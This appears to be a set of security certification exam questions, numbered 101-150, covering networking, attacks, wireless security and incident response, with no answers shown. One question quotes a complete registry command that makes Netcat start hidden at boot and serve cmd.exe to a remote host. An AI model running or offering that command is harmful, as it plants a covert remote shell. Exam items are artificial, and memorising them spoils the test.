CD 101-150

You are taking over the security of an existing network. You discover a machine that is not being used as such, but has software on it that emulates the activity of a sensitive database server. What is this?. A Polymorphic Virus. A Virus. A reactive IDS. A Honey Pot.

Alice wants to prove her identity to Bob. Bob requests her password as proof of identity, which Alice dutifully provides (possibly after some transformation like a hash function); meanwhile, Eve is eavesdropping the conversation and keeps the password. After the interchange is over, Eve connects to Bob posing as Alice; when asked for a proof of identity, Eve sends Alice's password read from the last session, which Bob accepts. Which of the following attacks is being used by Eve?. Replay. Fire walking. Cross site scripting. Session fixation.

Which of the following types of transmission is the process of sending one bit at a time over a single transmission line?. Unicast transmission. Serial data transmission. Multicast transmission. Parallel data transmission.

FILL BLANK - Fill in the blank with the appropriate term. ______________management is an area of systems management that involves acquiring, testing, and installing multiple patches (code changes) to an administered computer system.

Which of the following are used as a cost estimating technique during the project planning stage? Each correct answer represents a complete solution. (Choose three.). Function point analysis. Program Evaluation Review Technique (PERT). Expert judgment. Delphi technique.

Which of the following provide an "always on" Internet access service when connecting to an ISP? Each correct answer represents a complete solution. (Choose two.). Digital modem. Cable modem. Analog modem. DSL.

Which of the following types of coaxial cable is used for cable TV and cable modems?. RG-62. RG-59. RG-58. RG-8.

Which of the following fields in the IPv6 header is decremented by 1 for each router that forwards the packet?. Flow label. Next header. Traffic class. Hop limit.

Which of the following is a type of computer security that deals with protection against spurious signals emitted by electrical equipment in the system?. Communication Security. Physical security. Emanation Security. Hardware security.

Which of the following network devices operate at the network layer of the OSI model? Each correct answer represents a complete solution. Choose all that apply. Router. Bridge. Repeater. Gateway.

FILL BLANK - Fill in the blank with the appropriate term. The ______________ layer establishes, manages, and terminates the connections between the local and remote application.

Adam, a malicious hacker, has just succeeded in stealing a secure cookie via a XSS attack. He is able to replay the cookie even while the session is valid on the server. Which of the following is the most likely reason of this cause?. No encryption is applied. Two way encryption is applied. Encryption is performed at the network layer (layer 1 encryption). Encryption is performed at the application layer (single encryption key).

Fill in the blank with the appropriate word. A ______________ policy is defined as the document that describes the scope of an organization's security requirements.

Which of the following is a Unix and Windows tool capable of intercepting traffic on a network segment and capturing username and password?. AirSnort. Ettercap. BackTrack. Aircrack.

Which of the following standards is a proposed enhancement to the 802.11a and 802.11b wireless LAN (WLAN) specifications that offers quality of service (QoS) features, including the prioritization of data, voice, and video transmissions?. 802.15. 802.11n. 802.11e. 802.11h.

Which of the following key features is used by TCP in order to regulate the amount of data sent by a host to another host on the network?. Sequence number. TCP timestamp. Congestion control. Flow control.

Which of the following representatives in the incident response process are included in the incident response team? Each correct answer represents a complete solution. Choose all that apply. Information security representative. Legal representative. Technical representative. Lead investigator. Human resources. Sales representative.

Which of the following is a device that provides local communication between the datalogger and a computer?. Controllerless modem. Optical modem. Acoustic modem. Short haul modem.

Which of the following plans is documented and organized for emergency response, backup operations, and recovery maintained by an activity as part of its security program that will ensure the availability of critical resources and facilitates the continuity of operations in an emergency situation?. Contingency Plan. Disaster Recovery Plan. Business Continuity Plan. Continuity Of Operations Plan.

FILL BLANK - Fill in the blank with the appropriate term. ______________ is the use of sensitive words in e-mails to jam the authorities that listen in on them by providing a form of a red herring and an intentional annoyance.

Which of the following is a standard-based protocol that provides the highest level of VPN security?. L2TP. IP. PPP. IPSec.

You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply. You want to perform banner grabbing. You want to put Netcat in the stealth mode. You want to add the Netcat command to the Windows registry. You want to set the Netcat to execute command any time.

Which of the following UTP cables uses four pairs of twisted cable and provides transmission speeds of up to 16 Mbps?. Category 5e. Category 3. Category 5. Category 6.

Which of the following protocols is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM)?. BGMP. DVMRP. OSPF. EIGRP.

You have just set up a wireless network for customers at a coffee shop. Which of the following are good security measures to implement? Each correct answer represents a complete solution. (Choose two.). Using WPA encryption. Not broadcasting SSID. Using WEP encryption. MAC filtering the router.

Which of the following are the various methods that a device can use for logging information on a Cisco router? Each correct answer represents a complete solution. Choose all that apply. Buffered logging. Syslog logging. NTP logging. Terminal logging. Console logging. SNMP logging.

Which of the following is a software tool used in passive attacks for capturing network traffic?. Sniffer. Intrusion detection system. Intrusion prevention system. Warchalking.

John works as an Incident manager for TechWorld Inc. His task is to set up a wireless network for his organization. For this, he needs to decide the appropriate devices and policies required to set up the network. Which of the following phases of the incident handling process will help him accomplish the task?. Containment. Recovery. Preparation. Eradication.

FILL BLANK - Fill in the blank with the appropriate term. A ______________ is a physical or logical subnetwork that adds an additional layer of security to an organization's Local Area Network (LAN).

Fill in the blank with the appropriate term. ______________ is a codename referring to investigations and studies of compromising emission (CE).

Which of the following router configuration modes changes terminal settings on a temporary basis, performs basic tests, and lists system information?. Global Config. Interface Config. Privileged EXEC. User EXEC.

Which of the following is the primary international body for fostering cooperative standards for telecommunications equipment and systems?. ICANN. IEEE. NIST. CCITT.

Which of the following is an exterior gateway protocol that communicates using a Transmission Control Protocol (TCP) and sends the updated router table information?. IGMP. IRDP. OSPF. BGP.

Which of the following statements are true about a wireless network? Each correct answer represents a complete solution. Choose all that apply. Data can be shared easily between wireless devices. It provides mobility to users to access a network. Data can be transmitted in different ways by using Cellular Networks, Mobitex, DataTAC, etc. It is easy to connect.

DRAG DROP - Drag and drop the terms to match with their descriptions. Select and Place: ASLR. Hypervisor. DEP.

Which of the following is a device that receives a digital signal on an electromagnetic or optical transmission medium and regenerates the signal along the next leg of the medium?. Gateway. Repeater. Network adapter. Transceiver.

Mark works as a Network Administrator for Infonet Inc. The company has a Windows 2000 Active Directory domain-based network. The domain contains one hundred Windows XP Professional client computers. Mark is deploying an 802.11 wireless LAN on the network. The wireless LAN will use Wired Equivalent Privacy (WEP) for all the connections. According to the company's security policy, the client computers must be able to automatically connect to the wireless LAN. However, the unauthorized computers must not be allowed to connect to the wireless LAN and view the wireless network. Mark wants to configure all the wireless access points and client computers to act in accordance with the company's security policy. What will he do to accomplish this? Each correct answer represents a part of the solution. (Choose three.). Install a firewall software on each wireless access point. Configure the authentication type for the wireless LAN to Shared Key. Disable SSID Broadcast and enable MAC address filtering on all wireless access points. Broadcast SSID to connect to the access point (AP). Configure the authentication type for the wireless LAN to Open system. On each client computer, add the SSID for the wireless LAN as the preferred network.

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action?. Analysis of Threats. Analysis of Vulnerabilities. Assessment of Risk. Identification of Critical Information. Application of Appropriate OPSEC Measures.

Which of the following is a communication protocol that multicasts messages and information among all member devices in an IP multicast group?. ICMP. IGMP. BGP. EGP.

In which of the following attacks do computers act as zombies and work together to send out bogus messages, thereby increasing the amount of phony traffic?. Smurf attack. Buffer-overflow attack. DDoS attack. Bonk attack.

Attacks are classified into which of the following? Each correct answer represents a complete solution. Choose all that apply. Active attack. Session hijacking. Passive attack. Replay attack.

Which of the following is a technique for gathering information about a remote network protected by a firewall?. Firewalking. Warchalking. Wardriving. Wardialing.

Which of the following is an Internet application protocol used for transporting Usenet news articles between news servers and for reading and posting articles by end-user client applications?. NNTP. BOOTP. DCAP. NTP.

Which of the following attacks is a class of brute force attacks that depends on the higher likelihood of collisions found between random attack attempts and a fixed degree of permutations?. Phishing attack. Replay attack. Birthday attack. Dictionary attack.

Which of the following is a digital telephone/telecommunication network that carries voice, data, and video over an existing telephone network infrastructure?. PPP. Frame relay. ISDN. X.25.

FILL BLANK - Fill in the blank with the appropriate term. ______________ is a prime example of a high-interaction honeypot.

FILL BLANK - Fill in the blank with the appropriate term. ______________ is an enumeration technique used to glean information about computer systems on a network and the services running its open ports.

Which of the following steps are required in an idle scan of a closed port? Each correct answer represents a part of the solution. Choose all that apply. The attacker sends a SYN/ACK to the zombie. The zombie's IP ID increases by only 1. In response to the SYN, the target sends a RST. The zombie ignores the unsolicited RST, and the IP ID remains unchanged. The zombie's IP ID increases by 2.

Which of the following is a mechanism that helps in ensuring that only the intended and authorized recipients are able to read data?. Integrity. Data availability. Confidentiality. Authentication.

Which of the following help in estimating and totaling up the equivalent money value of the benefits and costs to the community of projects for establishing whether they are worthwhile? Each correct answer represents a complete solution. Choose all that apply. Business Continuity Planning. Benefit-Cost Analysis. Disaster recovery. Cost-benefit analysis.